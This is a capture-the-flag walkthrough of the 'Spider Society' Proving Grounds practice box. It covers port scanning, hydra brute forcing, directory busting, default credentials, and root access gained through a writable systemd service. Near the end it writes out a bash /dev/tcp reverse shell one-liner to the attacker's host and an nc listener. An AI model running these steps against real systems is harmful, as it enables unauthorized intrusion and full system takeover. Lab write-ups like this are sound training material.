Summary:
Spider Society is a practice box on Offensive Security’s Proving Grounds that emphasizes web application enumeration and classic Linux privilege-escalation techniques.
NMAP
[+] I typically start scanning for any/all open ports and then I get a more detailed scan on the specific ports that were identified. I also use the tool rustscan to verify that nmap did not miss any open ports.
nmap -p- -T4 $ip
rustscan -a $ip --ulimit 5000
nmap -A -T4 -p 22,80,2121 $ip -oN nmap.fulltcp
Port Enumeration
[+] Before checking out port 80, let’s rule out any low hanging fruit on ssh or ftp.
hydra -C ftp-betterdefaultpasslist.txt ssh://192.168.249.214 -t 4 -v
hydra -s 2121 -C ftp-betterdefaultpasslist.txt ftp://192.168.249.214 -t 4 -vThese brute force attacks were unsuccessful, which I figured would be the case.
Web Enumeration
[+] Checking out port 80, our landing page has a login functionality that leads to a 404 page. Towards the bottom we get an email with an indication of the domain name. It’s always important to add this to our /etc/hosts file. Add both the domain and subdomain.
[+] Now that we have our domains listed in our hosts file, we can run Directory Busting attacks against these domains.
gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -k -t 30
gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -k -t 30We get a hit for a directory named
libspider
[+] Navigating the delineated directory from our scan, we land on a login page. Testing for default creds is always such an important step. Many times, admins will choose convenience over security. Thee ole reliable admin:admin worked perfectly, and we find a communications tab that prompts us with some login credentials.
[+] Password reuse is important so we could test these creds against ssh, but it won’t work and as the username suggests, these creds are intended for ftp.
ftp 192.168.212.214 -p 2121
[+] We find a hidden file that we cannot download or view. Within the libspider directory we see the control-panel.php file which is the URL path we are currently in after successful login. This gives me the indication that we should be able to curl to this path, swap out the control-panel.php file for the hidden file, and get the output of the contents of that file. Let’s test it.
curl http://offsec.lab/libspider/.fuhfjkzbdsfuybefzmdbbzdcbhjzdbcukbdvbsdvuibdvnbdvenv
Initial Access
[+] Great! We got more creds. We know there are no other login portals within the spider society application so let’s test these against the only other port that is open externally to us – SSH!
ssh spidey@192.168.212.214
We’re In!
Priv Esc
[+] Any ethical hacker knows, the first thing to check is if our current user has any sudo privileges we can abuse. In this case it looks like we do. I also like to run some automated tools like linpeas and start pspy for processes and cron jobs we may potentially be able to exploit.
sudo -l
systemctl list-units --type=service --all | grep spider
systemctl cat spiderbackup.service
We verify that the service file exists by using systemctl and grepping for that service and then we can see the data of the file by using systemctl & cat together.
[+] Before we attempt any escalation paths we must confirm we have write permissions to this service file.
ls -la /etc/systemd/system/spiderbackup.service
This service file is owned by our current user so we can definitely modify it.
Root
[+] We notice our service file uses ExecStart to initiate a spiderbackup.sh script file in the /usr/local/bin path. We should be able to point it to bash binary /bin/bash and the execute a simple revshell one liner. Let’s modify this file, restart the service, and cross our fingers.
nano /etc/systemd/system/spiderbackup.service # modify service file
/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.167/443 0>&1' # our revshell payload
[+] Set up listener to capture the shell and restart the service to initiate our payload
#kali
nc -nvlp 443
#Target
sudo /bin/systemctl daemon-reload # refreshes with the current revshell in our service file
sudo /bin/systemctl restart spiderbackup.service # restarts the service and triggers our payload
Pwn3d!